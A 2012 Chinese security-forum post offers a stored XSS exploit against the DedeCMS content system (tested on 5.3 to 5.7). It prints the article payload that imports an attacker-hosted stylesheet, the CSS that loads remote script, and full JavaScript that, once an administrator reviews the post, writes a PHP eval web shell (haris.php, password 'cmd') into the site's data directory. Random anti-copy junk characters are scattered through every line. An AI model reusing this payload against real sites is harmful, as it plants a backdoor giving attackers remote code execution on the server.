找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1844|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell  o* b' i+ M! f: {, X, m" D* q2 I
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)' H; g3 t1 o6 g: h0 b, j8 n9 i
目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。: H- w8 R% S/ P* J7 @3 o
下面说说利用方法。. p* p" x7 z" L6 ?
条件有2个:! k' G4 B5 V$ u+ a8 L( ~% f9 N
1.开启注册9 a6 C% d% w. a6 w
2.开启投稿8 y, D0 I- X2 @0 b
注册会员----发表文章
9 F* N. q7 w/ {$ i) i内容填写:
. i6 g6 S, Z0 n. c# X3 P- z0 H复制代码
6 B( p- |3 f& N* h/ A<style>@im\port'\http://xxx.com/xss.css';</style>& J. K8 Y! R/ t7 ?- s+ h! S( [
新建XSS.Css* X4 D8 a" h- W) \- L: X5 c
复制代码
2 X+ F/ l; a( B6 j.body{
# m7 ?3 U- e0 J/ t: `- p. a; o- ~# xbackground-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }
( K9 r$ ?, f  v% j* X6 N6 {/ Y/ Z新建xss.js 内容为+ ^# N6 f2 e8 N7 U) g0 e3 h
复制代码# x4 `" @5 ^/ M1 K
1.var request = false;
; A* {1 w9 k4 N: ~4 p2.if(window.XMLHttpRequest) {6 Y) s4 y; ~) ~
3.request = new XMLHttpRequest();
3 K& e# L7 x+ }, I4.if(request.overrideMimeType) {
) F' u5 J: o0 B5.request.overrideMimeType('text/xml');6 O" W0 v0 h2 J- m" |. d+ _. M
6.}
# g, S2 {* F9 I& Q( l7.} else if(window.ActiveXObject) {- H$ x% r+ z" h2 b" F+ @
8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];+ d; Q$ J. {8 V. n# R$ V2 A8 Z
9.for(var i=0; i<versions.length; i++) {
% L, H! ?+ C( O, W: k# R+ }! ^10.try {
  M% p* v. h4 N9 D+ j- v( b11.request = new ActiveXObject(versions);
0 T5 u  q) }; L" Z2 f9 m12.} catch(e) {}/ L% o" ]" y; c5 I, H
13.}- M) z  }# A! l* v- m/ H
14.}( V; y' A/ J1 g4 R1 i
15.xmlhttp=request;; r* j- `" f. l/ h# K" M: \
16.function getFolder( url ){6 x4 E& w4 n% w& k1 m
17. obj = url.split('/')
% a$ G* x6 {( @- T) B. w; O8 Y4 @18. return obj[obj.length-2]
7 X2 K$ e; w1 T! ]19.}
1 w& `! Y+ L# \1 a$ k  j3 _" [20.oUrl = top.location.href;
% }% B  u  R5 M- p( T: N; e21.u = getFolder(oUrl);* J$ z7 N- B4 b# _- X  w
22.add_admin();- T. H, i9 b' f, r# q$ E
23.function add_admin(){
0 S% M* Z1 p% F: n* b  \' P- Q24.var url= "/"+u+"/sys_sql_query.php";* O4 C! N, @* ]0 f# A: j
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
# N( T7 |3 P4 c: h% c26.xmlhttp.open("POST", url, true);, E0 c$ O) Z+ `" |3 u
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
( Y( {1 a% N. q+ J7 ?0 W28.xmlhttp.setRequestHeader("Content-length", params.length);2 V/ D7 B" N- C; W+ F3 d7 T
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");
2 W9 K% `: ]3 x9 C& l6 G30.xmlhttp.send(params);/ O* b% j- C$ A2 W0 l! o
31.}
1 I5 G& B( y0 p# v1 J: J当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表